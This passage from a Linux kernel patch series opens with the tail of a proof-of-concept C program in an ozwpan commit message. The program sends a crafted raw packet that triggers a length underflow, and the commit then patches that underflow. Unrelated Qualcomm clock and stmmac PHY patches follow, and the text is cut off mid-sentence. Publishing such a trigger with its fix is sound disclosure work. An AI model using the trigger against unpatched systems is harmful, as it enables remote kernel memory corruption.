0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 }, .oz_elt2 = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_multiple_fixed) - 3 }, .oz_multiple_fixed = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_USB_ENDPOINT_DATA, .endpoint = 0, .format = OZ_DATA_F_MULTIPLE_FIXED, .unit_size = 1, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld Acked-by: Dan Carpenter Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/staging/ozwpan/ozusbsvc1.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/staging/ozwpan/ozusbsvc1.c b/drivers/staging/ozwpan/ozusbsvc1.c index 7b13dc910172..f660bb198c65 100644 --- a/drivers/staging/ozwpan/ozusbsvc1.c +++ b/drivers/staging/ozwpan/ozusbsvc1.c @@ -326,10 +326,11 @@ static void oz_usb_handle_ep_data(struct oz_usb_ctx *usb_ctx, struct oz_multiple_fixed *body = (struct oz_multiple_fixed *)data_hdr; u8 *data = body->data; - int n; - if (!body->unit_size) + unsigned int n; + if (!body->unit_size || + len < sizeof(struct oz_multiple_fixed) - 1) break; - n = (len - sizeof(struct oz_multiple_fixed)+1) + n = (len - (sizeof(struct oz_multiple_fixed) - 1)) / body->unit_size; while (n--) { oz_hcd_data_ind(usb_ctx->hport, body->endpoint, From f7b81d67d0547c6ce246c89900eaa41303a3f89a Mon Sep 17 00:00:00 2001 From: Stephen Boyd Date: Wed, 27 May 2015 11:02:46 -0700 Subject: [PATCH 481/872] clk: qcom: Add support for NSS/GMAC clocks and resets Add the NSS/GMAC clocks and the TCM clock and NSS resets. Signed-off-by: Stephen Boyd Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- drivers/clk/qcom/gcc-ipq806x.c | 594 ++++++++++++++++++- include/dt-bindings/clock/qcom,gcc-ipq806x.h | 2 + include/dt-bindings/reset/qcom,gcc-ipq806x.h | 43 ++ 3 files changed, 638 insertions(+), 1 deletion(-) diff --git a/drivers/clk/qcom/gcc-ipq806x.c b/drivers/clk/qcom/gcc-ipq806x.c index a50936a17376..563969942a1d 100644 --- a/drivers/clk/qcom/gcc-ipq806x.c +++ b/drivers/clk/qcom/gcc-ipq806x.c @@ -140,12 +140,47 @@ static struct clk_regmap pll14_vote = { }, }; +#define NSS_PLL_RATE(f, _l, _m, _n, i) \ + { \ + .freq = f, \ + .l = _l, \ + .m = _m, \ + .n = _n, \ + .ibits = i, \ + } + +static struct pll_freq_tbl pll18_freq_tbl[] = { + NSS_PLL_RATE(550000000, 44, 0, 1, 0x01495625), + NSS_PLL_RATE(733000000, 58, 16, 25, 0x014b5625), +}; + +static struct clk_pll pll18 = { + .l_reg = 0x31a4, + .m_reg = 0x31a8, + .n_reg = 0x31ac, + .config_reg = 0x31b4, + .mode_reg = 0x31a0, + .status_reg = 0x31b8, + .status_bit = 16, + .post_div_shift = 16, + .post_div_width = 1, + .freq_tbl = pll18_freq_tbl, + .clkr.hw.init = &(struct clk_init_data){ + .name = "pll18", + .parent_names = (const char *[]){ "pxo" }, + .num_parents = 1, + .ops = &clk_pll_ops, + }, +}; + enum { P_PXO, P_PLL8, P_PLL3, P_PLL0, P_CXO, + P_PLL14, + P_PLL18, }; static const struct parent_map gcc_pxo_pll8_map[] = { @@ -197,6 +232,22 @@ static const char *gcc_pxo_pll8_pll0_map[] = { "pll0_vote", }; +static const struct parent_map gcc_pxo_pll8_pll14_pll18_pll0_map[] = { + { P_PXO, 0 }, + { P_PLL8, 4 }, + { P_PLL0, 2 }, + { P_PLL14, 5 }, + { P_PLL18, 1 } +}; + +static const char *gcc_pxo_pll8_pll14_pll18_pll0[] = { + "pxo", + "pll8_vote", + "pll0_vote", + "pll14", + "pll18", +}; + static struct freq_tbl clk_tbl_gsbi_uart[] = { { 1843200, P_PLL8, 2, 6, 625 }, { 3686400, P_PLL8, 2, 12, 625 }, @@ -2202,6 +2253,472 @@ static struct clk_branch ebi2_aon_clk = { }, }; +static const struct freq_tbl clk_tbl_gmac[] = { + { 133000000, P_PLL0, 1, 50, 301 }, + { 266000000, P_PLL0, 1, 127, 382 }, + { } +}; + +static struct clk_dyn_rcg gmac_core1_src = { + .ns_reg[0] = 0x3cac, + .ns_reg[1] = 0x3cb0, + .md_reg[0] = 0x3ca4, + .md_reg[1] = 0x3ca8, + .bank_reg = 0x3ca0, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3ca0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core1_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core1_clk = { + .halt_reg = 0x3c20, + .halt_bit = 4, + .hwcg_reg = 0x3cb4, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3cb4, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core1_clk", + .parent_names = (const char *[]){ + "gmac_core1_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static struct clk_dyn_rcg gmac_core2_src = { + .ns_reg[0] = 0x3ccc, + .ns_reg[1] = 0x3cd0, + .md_reg[0] = 0x3cc4, + .md_reg[1] = 0x3cc8, + .bank_reg = 0x3ca0, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3cc0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core2_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core2_clk = { + .halt_reg = 0x3c20, + .halt_bit = 5, + .hwcg_reg = 0x3cd4, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3cd4, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core2_clk", + .parent_names = (const char *[]){ + "gmac_core2_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static struct clk_dyn_rcg gmac_core3_src = { + .ns_reg[0] = 0x3cec, + .ns_reg[1] = 0x3cf0, + .md_reg[0] = 0x3ce4, + .md_reg[1] = 0x3ce8, + .bank_reg = 0x3ce0, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3ce0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core3_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core3_clk = { + .halt_reg = 0x3c20, + .halt_bit = 6, + .hwcg_reg = 0x3cf4, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3cf4, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core3_clk", + .parent_names = (const char *[]){ + "gmac_core3_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static struct clk_dyn_rcg gmac_core4_src = { + .ns_reg[0] = 0x3d0c, + .ns_reg[1] = 0x3d10, + .md_reg[0] = 0x3d04, + .md_reg[1] = 0x3d08, + .bank_reg = 0x3d00, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_gmac, + .clkr = { + .enable_reg = 0x3d00, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core4_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch gmac_core4_clk = { + .halt_reg = 0x3c20, + .halt_bit = 7, + .hwcg_reg = 0x3d14, + .hwcg_bit = 6, + .clkr = { + .enable_reg = 0x3d14, + .enable_mask = BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "gmac_core4_clk", + .parent_names = (const char *[]){ + "gmac_core4_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static const struct freq_tbl clk_tbl_nss_tcm[] = { + { 266000000, P_PLL0, 3, 0, 0 }, + { 400000000, P_PLL0, 2, 0, 0 }, + { } +}; + +static struct clk_dyn_rcg nss_tcm_src = { + .ns_reg[0] = 0x3dc4, + .ns_reg[1] = 0x3dc8, + .bank_reg = 0x3dc0, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 4, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 4, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_nss_tcm, + .clkr = { + .enable_reg = 0x3dc0, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "nss_tcm_src", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + }, + }, +}; + +static struct clk_branch nss_tcm_clk = { + .halt_reg = 0x3c20, + .halt_bit = 14, + .clkr = { + .enable_reg = 0x3dd0, + .enable_mask = BIT(6) | BIT(4), + .hw.init = &(struct clk_init_data){ + .name = "nss_tcm_clk", + .parent_names = (const char *[]){ + "nss_tcm_src", + }, + .num_parents = 1, + .ops = &clk_branch_ops, + .flags = CLK_SET_RATE_PARENT, + }, + }, +}; + +static const struct freq_tbl clk_tbl_nss[] = { + { 110000000, P_PLL18, 1, 1, 5 }, + { 275000000, P_PLL18, 2, 0, 0 }, + { 550000000, P_PLL18, 1, 0, 0 }, + { 733000000, P_PLL18, 1, 0, 0 }, + { } +}; + +static struct clk_dyn_rcg ubi32_core1_src_clk = { + .ns_reg[0] = 0x3d2c, + .ns_reg[1] = 0x3d30, + .md_reg[0] = 0x3d24, + .md_reg[1] = 0x3d28, + .bank_reg = 0x3d20, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_nss, + .clkr = { + .enable_reg = 0x3d20, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "ubi32_core1_src_clk", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + .flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE, + }, + }, +}; + +static struct clk_dyn_rcg ubi32_core2_src_clk = { + .ns_reg[0] = 0x3d4c, + .ns_reg[1] = 0x3d50, + .md_reg[0] = 0x3d44, + .md_reg[1] = 0x3d48, + .bank_reg = 0x3d40, + .mn[0] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .mn[1] = { + .mnctr_en_bit = 8, + .mnctr_reset_bit = 7, + .mnctr_mode_shift = 5, + .n_val_shift = 16, + .m_val_shift = 16, + .width = 8, + }, + .s[0] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .s[1] = { + .src_sel_shift = 0, + .parent_map = gcc_pxo_pll8_pll14_pll18_pll0_map, + }, + .p[0] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .p[1] = { + .pre_div_shift = 3, + .pre_div_width = 2, + }, + .mux_sel_bit = 0, + .freq_tbl = clk_tbl_nss, + .clkr = { + .enable_reg = 0x3d40, + .enable_mask = BIT(1), + .hw.init = &(struct clk_init_data){ + .name = "ubi32_core2_src_clk", + .parent_names = gcc_pxo_pll8_pll14_pll18_pll0, + .num_parents = 5, + .ops = &clk_dyn_rcg_ops, + .flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE, + }, + }, +}; + static struct clk_regmap *gcc_ipq806x_clks[] = { [PLL0] = &pll0.clkr, [PLL0_VOTE] = &pll0_vote, @@ -2211,6 +2728,7 @@ static struct clk_regmap *gcc_ipq806x_clks[] = { [PLL8_VOTE] = &pll8_vote, [PLL14] = &pll14.clkr, [PLL14_VOTE] = &pll14_vote, + [PLL18] = &pll18.clkr, [GSBI1_UART_SRC] = &gsbi1_uart_src.clkr, [GSBI1_UART_CLK] = &gsbi1_uart_clk.clkr, [GSBI2_UART_SRC] = &gsbi2_uart_src.clkr, @@ -2307,6 +2825,18 @@ static struct clk_regmap *gcc_ipq806x_clks[] = { [USB_FS1_SYSTEM_CLK] = &usb_fs1_sys_clk.clkr, [EBI2_CLK] = &ebi2_clk.clkr, [EBI2_AON_CLK] = &ebi2_aon_clk.clkr, + [GMAC_CORE1_CLK_SRC] = &gmac_core1_src.clkr, + [GMAC_CORE1_CLK] = &gmac_core1_clk.clkr, + [GMAC_CORE2_CLK_SRC] = &gmac_core2_src.clkr, + [GMAC_CORE2_CLK] = &gmac_core2_clk.clkr, + [GMAC_CORE3_CLK_SRC] = &gmac_core3_src.clkr, + [GMAC_CORE3_CLK] = &gmac_core3_clk.clkr, + [GMAC_CORE4_CLK_SRC] = &gmac_core4_src.clkr, + [GMAC_CORE4_CLK] = &gmac_core4_clk.clkr, + [UBI32_CORE1_CLK_SRC] = &ubi32_core1_src_clk.clkr, + [UBI32_CORE2_CLK_SRC] = &ubi32_core2_src_clk.clkr, + [NSSTCM_CLK_SRC] = &nss_tcm_src.clkr, + [NSSTCM_CLK] = &nss_tcm_clk.clkr, }; static const struct qcom_reset_map gcc_ipq806x_resets[] = { @@ -2425,6 +2955,48 @@ static const struct qcom_reset_map gcc_ipq806x_resets[] = { [USB30_1_PHY_RESET] = { 0x3b58, 0 }, [NSSFB0_RESET] = { 0x3b60, 6 }, [NSSFB1_RESET] = { 0x3b60, 7 }, + [UBI32_CORE1_CLKRST_CLAMP_RESET] = { 0x3d3c, 3}, + [UBI32_CORE1_CLAMP_RESET] = { 0x3d3c, 2 }, + [UBI32_CORE1_AHB_RESET] = { 0x3d3c, 1 }, + [UBI32_CORE1_AXI_RESET] = { 0x3d3c, 0 }, + [UBI32_CORE2_CLKRST_CLAMP_RESET] = { 0x3d5c, 3 }, + [UBI32_CORE2_CLAMP_RESET] = { 0x3d5c, 2 }, + [UBI32_CORE2_AHB_RESET] = { 0x3d5c, 1 }, + [UBI32_CORE2_AXI_RESET] = { 0x3d5c, 0 }, + [GMAC_CORE1_RESET] = { 0x3cbc, 0 }, + [GMAC_CORE2_RESET] = { 0x3cdc, 0 }, + [GMAC_CORE3_RESET] = { 0x3cfc, 0 }, + [GMAC_CORE4_RESET] = { 0x3d1c, 0 }, + [GMAC_AHB_RESET] = { 0x3e24, 0 }, + [NSS_CH0_RST_RX_CLK_N_RESET] = { 0x3b60, 0 }, + [NSS_CH0_RST_TX_CLK_N_RESET] = { 0x3b60, 1 }, + [NSS_CH0_RST_RX_125M_N_RESET] = { 0x3b60, 2 }, + [NSS_CH0_HW_RST_RX_125M_N_RESET] = { 0x3b60, 3 }, + [NSS_CH0_RST_TX_125M_N_RESET] = { 0x3b60, 4 }, + [NSS_CH1_RST_RX_CLK_N_RESET] = { 0x3b60, 5 }, + [NSS_CH1_RST_TX_CLK_N_RESET] = { 0x3b60, 6 }, + [NSS_CH1_RST_RX_125M_N_RESET] = { 0x3b60, 7 }, + [NSS_CH1_HW_RST_RX_125M_N_RESET] = { 0x3b60, 8 }, + [NSS_CH1_RST_TX_125M_N_RESET] = { 0x3b60, 9 }, + [NSS_CH2_RST_RX_CLK_N_RESET] = { 0x3b60, 10 }, + [NSS_CH2_RST_TX_CLK_N_RESET] = { 0x3b60, 11 }, + [NSS_CH2_RST_RX_125M_N_RESET] = { 0x3b60, 12 }, + [NSS_CH2_HW_RST_RX_125M_N_RESET] = { 0x3b60, 13 }, + [NSS_CH2_RST_TX_125M_N_RESET] = { 0x3b60, 14 }, + [NSS_CH3_RST_RX_CLK_N_RESET] = { 0x3b60, 15 }, + [NSS_CH3_RST_TX_CLK_N_RESET] = { 0x3b60, 16 }, + [NSS_CH3_RST_RX_125M_N_RESET] = { 0x3b60, 17 }, + [NSS_CH3_HW_RST_RX_125M_N_RESET] = { 0x3b60, 18 }, + [NSS_CH3_RST_TX_125M_N_RESET] = { 0x3b60, 19 }, + [NSS_RST_RX_250M_125M_N_RESET] = { 0x3b60, 20 }, + [NSS_RST_TX_250M_125M_N_RESET] = { 0x3b60, 21 }, + [NSS_QSGMII_TXPI_RST_N_RESET] = { 0x3b60, 22 }, + [NSS_QSGMII_CDR_RST_N_RESET] = { 0x3b60, 23 }, + [NSS_SGMII2_CDR_RST_N_RESET] = { 0x3b60, 24 }, + [NSS_SGMII3_CDR_RST_N_RESET] = { 0x3b60, 25 }, + [NSS_CAL_PRBS_RST_N_RESET] = { 0x3b60, 26 }, + [NSS_LCKDT_RST_N_RESET] = { 0x3b60, 27 }, + [NSS_SRDS_N_RESET] = { 0x3b60, 28 }, }; static const struct regmap_config gcc_ipq806x_regmap_config = { @@ -2453,6 +3025,8 @@ static int gcc_ipq806x_probe(struct platform_device *pdev) { struct clk *clk; struct device *dev = &pdev->dev; + struct regmap *regmap; + int ret; /* Temporary until RPM clocks supported */ clk = clk_register_fixed_rate(dev, "cxo", NULL, CLK_IS_ROOT, 25000000); @@ -2463,7 +3037,25 @@ static int gcc_ipq806x_probe(struct platform_device *pdev) if (IS_ERR(clk)) return PTR_ERR(clk); - return qcom_cc_probe(pdev, &gcc_ipq806x_desc); + ret = qcom_cc_probe(pdev, &gcc_ipq806x_desc); + if (ret) + return ret; + + regmap = dev_get_regmap(dev, NULL); + if (!regmap) + return -ENODEV; + + /* Setup PLL18 static bits */ + regmap_update_bits(regmap, 0x31a4, 0xffffffc0, 0x40000400); + regmap_write(regmap, 0x31b0, 0x3080); + + /* Set GMAC footswitch sleep/wakeup values */ + regmap_write(regmap, 0x3cb8, 8); + regmap_write(regmap, 0x3cd8, 8); + regmap_write(regmap, 0x3cf8, 8); + regmap_write(regmap, 0x3d18, 8); + + return 0; } static int gcc_ipq806x_remove(struct platform_device *pdev) diff --git a/include/dt-bindings/clock/qcom,gcc-ipq806x.h b/include/dt-bindings/clock/qcom,gcc-ipq806x.h index ebd63fd05649..dc4254b8cbbc 100644 --- a/include/dt-bindings/clock/qcom,gcc-ipq806x.h +++ b/include/dt-bindings/clock/qcom,gcc-ipq806x.h @@ -289,5 +289,7 @@ #define UBI32_CORE1_CLK 279 #define UBI32_CORE2_CLK 280 #define EBI2_AON_CLK 281 +#define NSSTCM_CLK_SRC 282 +#define NSSTCM_CLK 283 #endif diff --git a/include/dt-bindings/reset/qcom,gcc-ipq806x.h b/include/dt-bindings/reset/qcom,gcc-ipq806x.h index 0ad5ef930b5d..de9c8140931a 100644 --- a/include/dt-bindings/reset/qcom,gcc-ipq806x.h +++ b/include/dt-bindings/reset/qcom,gcc-ipq806x.h @@ -129,4 +129,47 @@ #define USB30_1_PHY_RESET 112 #define NSSFB0_RESET 113 #define NSSFB1_RESET 114 +#define UBI32_CORE1_CLKRST_CLAMP_RESET 115 +#define UBI32_CORE1_CLAMP_RESET 116 +#define UBI32_CORE1_AHB_RESET 117 +#define UBI32_CORE1_AXI_RESET 118 +#define UBI32_CORE2_CLKRST_CLAMP_RESET 119 +#define UBI32_CORE2_CLAMP_RESET 120 +#define UBI32_CORE2_AHB_RESET 121 +#define UBI32_CORE2_AXI_RESET 122 +#define GMAC_CORE1_RESET 123 +#define GMAC_CORE2_RESET 124 +#define GMAC_CORE3_RESET 125 +#define GMAC_CORE4_RESET 126 +#define GMAC_AHB_RESET 127 +#define NSS_CH0_RST_RX_CLK_N_RESET 128 +#define NSS_CH0_RST_TX_CLK_N_RESET 129 +#define NSS_CH0_RST_RX_125M_N_RESET 130 +#define NSS_CH0_HW_RST_RX_125M_N_RESET 131 +#define NSS_CH0_RST_TX_125M_N_RESET 132 +#define NSS_CH1_RST_RX_CLK_N_RESET 133 +#define NSS_CH1_RST_TX_CLK_N_RESET 134 +#define NSS_CH1_RST_RX_125M_N_RESET 135 +#define NSS_CH1_HW_RST_RX_125M_N_RESET 136 +#define NSS_CH1_RST_TX_125M_N_RESET 137 +#define NSS_CH2_RST_RX_CLK_N_RESET 138 +#define NSS_CH2_RST_TX_CLK_N_RESET 139 +#define NSS_CH2_RST_RX_125M_N_RESET 140 +#define NSS_CH2_HW_RST_RX_125M_N_RESET 141 +#define NSS_CH2_RST_TX_125M_N_RESET 142 +#define NSS_CH3_RST_RX_CLK_N_RESET 143 +#define NSS_CH3_RST_TX_CLK_N_RESET 144 +#define NSS_CH3_RST_RX_125M_N_RESET 145 +#define NSS_CH3_HW_RST_RX_125M_N_RESET 146 +#define NSS_CH3_RST_TX_125M_N_RESET 147 +#define NSS_RST_RX_250M_125M_N_RESET 148 +#define NSS_RST_TX_250M_125M_N_RESET 149 +#define NSS_QSGMII_TXPI_RST_N_RESET 150 +#define NSS_QSGMII_CDR_RST_N_RESET 151 +#define NSS_SGMII2_CDR_RST_N_RESET 152 +#define NSS_SGMII3_CDR_RST_N_RESET 153 +#define NSS_CAL_PRBS_RST_N_RESET 154 +#define NSS_LCKDT_RST_N_RESET 155 +#define NSS_SRDS_N_RESET 156 + #endif From 5790cf3c00c2f92aacba348e13f8a9a8f5dd96bd Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:47 -0700 Subject: [PATCH 482/872] stmmac: add phy-handle support to the platform layer On stmmac driver, PHY specification in device-tree was done using the non-standard property "snps,phy-addr". Specifying a PHY on a different MDIO bus that the one within the stmmac controller doesn't seem to be possible when device-tree is used. This change adds support for the phy-handle property, as specified in Documentation/devicetree/bindings/net/ethernet.txt. Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- .../net/ethernet/stmicro/stmmac/stmmac_main.c | 28 ++++++++++++------- .../ethernet/stmicro/stmmac/stmmac_platform.c | 6 +++- include/linux/stmmac.h | 1 + 3 files changed, 24 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c index e4f273976071..31c64169f2ec 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c @@ -52,6 +52,7 @@ #include "stmmac_ptp.h" #include "stmmac.h" #include +#include #define STMMAC_ALIGN(x) L1_CACHE_ALIGN(x) @@ -816,18 +817,25 @@ static int stmmac_init_phy(struct net_device *dev) priv->speed = 0; priv->oldduplex = -1; - if (priv->plat->phy_bus_name) - snprintf(bus_id, MII_BUS_ID_SIZE, "%s-%x", - priv->plat->phy_bus_name, priv->plat->bus_id); - else - snprintf(bus_id, MII_BUS_ID_SIZE, "stmmac-%x", - priv->plat->bus_id); + if (priv->plat->phy_node) { + phydev = of_phy_connect(dev, priv->plat->phy_node, + &stmmac_adjust_link, 0, interface); + } else { + if (priv->plat->phy_bus_name) + snprintf(bus_id, MII_BUS_ID_SIZE, "%s-%x", + priv->plat->phy_bus_name, priv->plat->bus_id); + else + snprintf(bus_id, MII_BUS_ID_SIZE, "stmmac-%x", + priv->plat->bus_id); - snprintf(phy_id_fmt, MII_BUS_ID_SIZE + 3, PHY_ID_FMT, bus_id, - priv->plat->phy_addr); - pr_debug("stmmac_init_phy: trying to attach to %s\n", phy_id_fmt); + snprintf(phy_id_fmt, MII_BUS_ID_SIZE + 3, PHY_ID_FMT, bus_id, + priv->plat->phy_addr); + pr_debug("stmmac_init_phy: trying to attach to %s\n", + phy_id_fmt); - phydev = phy_connect(dev, phy_id_fmt, &stmmac_adjust_link, interface); + phydev = phy_connect(dev, phy_id_fmt, &stmmac_adjust_link, + interface); + } if (IS_ERR(phydev)) { pr_err("%s: Could not attach to PHY\n", dev->name); diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c index 1664c0186f5b..8d23155a1a7e 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c @@ -28,6 +28,7 @@ #include #include #include +#include #include "stmmac.h" #include "stmmac_platform.h" @@ -144,13 +145,16 @@ static int stmmac_probe_config_dt(struct platform_device *pdev, /* Default to phy auto-detection */ plat->phy_addr = -1; + /* If we find a phy-handle property, use it as the PHY */ + plat->phy_node = of_parse_phandle(np, "phy-handle", 0); + /* "snps,phy-addr" is not a standard property. Mark it as deprecated * and warn of its use. Remove this when phy node support is added. */ if (of_property_read_u32(np, "snps,phy-addr", &plat->phy_addr) == 0) dev_warn(&pdev->dev, "snps,phy-addr property is deprecated\n"); - if (plat->phy_bus_name) + if (plat->phy_node || plat->phy_bus_name) plat->mdio_bus_data = NULL; else plat->mdio_bus_data = diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h index 7f484a239f53..c735f5c91eea 100644 --- a/include/linux/stmmac.h +++ b/include/linux/stmmac.h @@ -99,6 +99,7 @@ struct plat_stmmacenet_data { int phy_addr; int interface; struct stmmac_mdio_bus_data *mdio_bus_data; + struct device_node *phy_node; struct stmmac_dma_cfg *dma_cfg; int clk_csr; int has_gmac; From 277323814e495616dd76409bec855f5c68f54988 Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:48 -0700 Subject: [PATCH 483/872] stmmac: add fixed-link device-tree support In case DT is used, this change 